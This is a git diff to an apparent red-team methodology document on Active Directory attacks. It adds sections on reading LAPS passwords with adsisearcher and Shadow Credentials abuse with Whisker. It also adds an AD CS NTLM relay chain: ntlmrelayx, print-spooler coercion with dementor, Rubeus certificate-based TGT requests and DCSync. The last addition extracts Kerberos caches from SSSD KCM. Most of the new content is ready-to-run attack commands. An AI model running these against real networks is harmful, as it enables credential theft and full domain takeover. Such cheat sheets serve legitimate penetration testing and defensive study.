diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 80df322..a018e09 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -45,6 +45,7 @@ - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) - [Kerberoasting](#kerberoasting) - [KRB_AS_REP Roasting](#krbasrep-roasting) + - [Shadow Credentials](#shadow-credentials) - [Pass-the-Hash](#pass-the-hash) - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - [Using impacket](#using-impacket) @@ -56,6 +57,7 @@ - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) - [Drop the MIC](#drop-the-mic) - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) + - [AD CS Relay Attack](#ad-cs-relay-attack) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) - [GenericAll](#genericall) @@ -85,6 +87,7 @@ - [Linux Active Directory](#linux-active-directory) - [CCACHE ticket reuse from /tmp](#ccache-ticket-reuse-from-tmp) - [CCACHE ticket reuse from keyring](#ccache-ticket-reuse-from-keyring) + - [CCACHE ticket reuse from SSSD KCM](#ccache-ticket-reuse-from-sssd-kcm) - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab) - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab) - [References](#references) @@ -1087,6 +1090,12 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' > The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users +* adsisearcher (native binary on Windows 8+) + ```powershell + ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { $_.properties} + ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=MACHINE$))").findAll() | ForEach-Object { $_.properties} + ``` + * CrackMapExec ```powershell crackmapexec smb 10.10.10.10 -u user -H 8846f7eaee8fb117ad06bdd830b7586c -M laps @@ -1354,6 +1363,30 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa **Mitigations**: * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). + +### Shadow Credentials + +Requirements : +* Domain Controller on Windows Server 2016 +* PKINIT Kerberos authentication +* An account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object + +Add **Key Credentials** to the attribute **msDS-KeyCredentialLink** of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. + +```powershell +# https://github.com/eladshamir/Whisker + +Whisker.exe list /target:computername$ +# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. + +Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1 +# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. + +Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b +# Removes a key credential from the target object specified by a DeviceID GUID. +``` + + ### Pass-the-Hash The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. @@ -1586,6 +1619,29 @@ Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impack ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe ``` + +#### AD CS Relay Attack + +https://github.com/SecureAuthCorp/impacket/pull/1101 + +1. Run the ntlmrelayx.py and set your Certificate Authority (CA) as a target + ```powershell + python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs + python3 ntlmrelayx.py -t http://cs1.lab.local/certsrv/certfnsh.asp -smb2support --adcs + ``` +2. Exploit the print spooler bug + ```powershell + python3 dementor.py -u -p -d + python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local + ``` +3. Request the TGT using the certificate + ```powershell + Rubeus.exe asktgt /user: /certificate: /ptt + Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzCC......NfrHtUUXS /ptt + ``` +4. Now you can DCSync with the DC machine account + + ### Dangerous Built-in Groups Usage If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object. @@ -2448,6 +2504,22 @@ Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/Tar [X] [uid:0] Error retrieving tickets ``` +### CCACHE ticket reuse from SSSD KCM + +SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. +The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. +By default, the key is only readable if you have **root** permissions. + +Invoking `SSSDKCMExtractor` with the --database and --key parameters will parse the database and decrypt the secrets. + +```powershell +git clone https://github.com/fireeye/SSSDKCMExtractor +python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey +``` + +The credential cache Kerberos blob can be converted into a usable Kerberos CCache file that can be passed to Mimikatz/Rubeus. + + ### CCACHE ticket reuse from keytab ```powershell @@ -2577,3 +2649,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/) * [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) * [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques) +* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) +* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/) +* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work)